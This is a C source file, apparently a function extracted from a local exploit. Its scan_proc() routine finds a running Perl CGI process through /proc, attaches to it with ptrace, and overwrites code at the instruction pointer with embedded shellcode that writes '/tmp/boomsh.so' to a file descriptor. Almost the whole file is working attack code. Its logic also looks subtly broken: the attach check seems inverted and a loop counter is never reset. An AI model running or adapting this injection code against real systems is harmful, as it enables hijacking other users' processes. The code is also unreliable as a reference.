
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fname ;
typedef int code ;


 int EIP ;
 int O_RDONLY ;
 int PTRACE_ATTACH ;
 int PTRACE_DETACH ;
 int PTRACE_PEEKUSER ;
 int PTRACE_POKETEXT ;
 int PTRACE_POKEUSER ;
 int close (int) ;
 int die (char*) ;
 scalar_t__ errno ;
 int exit (int ) ;
 scalar_t__ fork () ;
 int getpid () ;
 int open (char*,int ) ;
 int printf (char*,...) ;
 scalar_t__ ptrace (int ,int,int,unsigned int) ;
 int read (int,char*,int) ;
 int snprintf (char*,int,char*,int) ;
 scalar_t__ strcmp (char*,char*) ;
 int waitpid (int,int *,int ) ;

int scan_proc()
{
 int lastpid, fd, i, pid, done = 0;
 unsigned int eip;
 char fname[1024];
 char code[] =
  "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  "\xe8\x10\x00\x00\x00\x2f\x74\x6d\x70\x2f\x62\x6f"
  "\x6f\x6d\x73\x68\x2e\x73\x6f\x0a\x00\xb8\x04\x00"
  "\x00\x00\xbb\x05\x00\x00\x00\x59\xba\x0f\x00\x00"
  "\x00\xcd\x80\xb8\x01\x00\x00\x00\x31\xdb\xcd\x80";
 unsigned long *p;

 printf("Forking off proc-scan to attach to CGI-script.\n");

 if (fork() > 0)
  return 0;

 lastpid = getpid();

 while (!done) {
  for (i = 0; i < 100; ++i) {
   snprintf(fname, sizeof(fname), "/proc/%d/cmdline", lastpid+i);
   if ((fd = open(fname, O_RDONLY)) < 0)
    continue;
   read(fd, fname, sizeof(fname));
   close(fd);
   if (strcmp(fname, "/usr/bin/perl") == 0) {
    if (ptrace(PTRACE_ATTACH, lastpid+i,0,0) < 0) {
     pid = lastpid+i;
     done = 1;
     break;
    }
   }
  }
 }

 printf("Got cgi-bin PID %d\n", pid);

 waitpid(pid, ((void*)0), 0);

 eip = ptrace(PTRACE_PEEKUSER, pid, 4*EIP, 0);
 if (errno)
  die("ptrace");
 for (p = (unsigned long*)code; i < sizeof(code); i+= 4, ++p) {
  if (ptrace(PTRACE_POKETEXT, pid, eip + i, *p) < 0)
   die("ptrace");
 }

 if (ptrace(PTRACE_POKEUSER, pid, 4*EIP, eip+4) < 0)
  die("ptrace");

 if (ptrace(PTRACE_DETACH, pid, 0, 0) < 0)
  die("ptrace");
 printf("Injecting of write-code finished.\n");
 exit(0);
}
